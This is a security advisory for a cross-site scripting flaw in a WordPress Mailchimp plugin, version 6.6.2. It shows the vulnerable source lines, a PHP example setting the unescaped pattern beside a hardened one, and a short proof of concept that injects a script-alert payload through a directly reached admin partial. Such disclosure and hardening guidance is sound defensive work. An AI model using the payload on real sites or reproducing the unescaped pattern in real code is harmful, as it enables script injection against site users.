WordPress Yikes Inc Easy Mailchimp Extender plugin version 6.6.2 suffers from a cross site scripting vulnerability.
c423a749c8f7efb16888e9b98084bd3a
[-] Title : WordPress plugin yikes-inc-easy-mailchimp-extender 6.6.2 - Cross Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Vendor :
https://wordpress.org/plugins/yikes-inc-easy-mailchimp-extender/
[-] Category : Webapps
[-] Date : 2020-02-20
==============================================================================================
Vulnerable Page:
yikes-inc-easy-mailchimp-extender/admin/partials/ajax/add_field_to_form.php
==============================================================================================
Vulnerable Source:
2: $form_data['field_name'] = $_POST['field_name'];
36: echo $form_data['field_name'];
50: echo $form_data['field_type'];
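The three lines above show the whole defect: a POST parameter is copied into $form_data and then echoed into the admin partial without any escaping, so any markup in field_name or field_type is rendered as HTML. The following PHP is an added illustration written for this page, not the plugin's own code: the unescaped pattern is reproduced beside a hardened version that uses standard WordPress APIs (check_ajax_referer, current_user_can, sanitize_text_field, sanitize_key, esc_html, esc_attr). The function names and the nonce action string (yikes_demo_*) are hypothetical, and the HTML wrapper around the echoed values is assumed for the sake of showing which escaper fits which context.

```php
<?php
// Added illustration, not the plugin's code. Demonstrates the unescaped
// output pattern described in the advisory and one way to harden it.
// All yikes_demo_* names and the nonce action are hypothetical.

// Direct access guard: a partial reached by its file path (as in the PoC
// URL) has no WordPress context, so it should not run at all outside of
// the AJAX handler that includes it.
if ( ! defined( 'ABSPATH' ) ) {
    exit;
}

/**
 * Vulnerable pattern (kept for contrast): request data is written straight
 * into the response. Any markup in field_name or field_type is rendered by
 * the browser instead of being shown as text.
 */
function yikes_demo_vulnerable_render( array $post ) {
    $form_data['field_name'] = $post['field_name'];
    $form_data['field_type'] = $post['field_type'];

    echo '<label>' . $form_data['field_name'] . '</label>';
    echo '<input type="' . $form_data['field_type'] . '">';
}

/**
 * Hardened version: verify the request, sanitize on input, escape on output
 * with the escaper that matches the HTML context.
 */
function yikes_demo_hardened_render() {
    // 1. Only accept the request through admin-ajax.php with a valid nonce
    //    tied to the action that the admin page's script sends.
    check_ajax_referer( 'yikes_demo_add_field', 'nonce' );

    // 2. Require a capability appropriate for editing form definitions.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges', 403 );
    }

    // 3. Sanitize input. wp_unslash() removes the slashes WordPress adds to
    //    superglobals; sanitize_text_field() strips tags and control bytes;
    //    sanitize_key() reduces the type to [a-z0-9_-].
    $field_name = isset( $_POST['field_name'] )
        ? sanitize_text_field( wp_unslash( $_POST['field_name'] ) )
        : '';
    $field_type = isset( $_POST['field_type'] )
        ? sanitize_key( wp_unslash( $_POST['field_type'] ) )
        : '';

    // Constrain field_type to the values the form actually supports.
    $allowed_types = array( 'text', 'email', 'number', 'checkbox', 'radio' );
    if ( ! in_array( $field_type, $allowed_types, true ) ) {
        wp_die( 'Unknown field type', 400 );
    }

    // 4. Escape output for its context: esc_html() between tags,
    //    esc_attr() inside an attribute value. "<script>" becomes
    //    "&lt;script&gt;" and is displayed, not executed.
    echo '<label>' . esc_html( $field_name ) . '</label>';
    echo '<input type="' . esc_attr( $field_type ) . '">';

    wp_die(); // terminate the AJAX response cleanly
}

// Register the handler so it is only reachable via admin-ajax.php?action=...
add_action( 'wp_ajax_yikes_demo_add_field', 'yikes_demo_hardened_render' );
```

Sanitizing on input is not a substitute for escaping on output: sanitize_text_field() strips tags, but the escaper is what guarantees the value cannot break out of the surrounding HTML, and it has to be chosen per context (esc_html for text nodes, esc_attr for attributes, esc_url for href/src). The ABSPATH guard and the nonce check together remove the direct-URL path the PoC relies on, since the partial is then only executed inside an authenticated, nonce-verified AJAX request.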
===============================================================================================
POC :
http://localhost/wp-content/plugins/yikes-inc-easy-mailchimp-extender/admin/partials/ajax/add_field_to_form.php
Step 1 = Go to the web page:
http://localhost/wp-content/plugins/yikes-inc-easy-mailchimp-extender/admin/partials/ajax/add_field_to_form.php
Step 2 = Locate the input boxes "field_name" and "field_type".
Step 3 = In the input box, add JavaScript code: <script>alert('XSS')</script>
===============================================================================================
************************
* ==> Contact us :
* Telegram : @MF0584
* Email : [email protected]
************************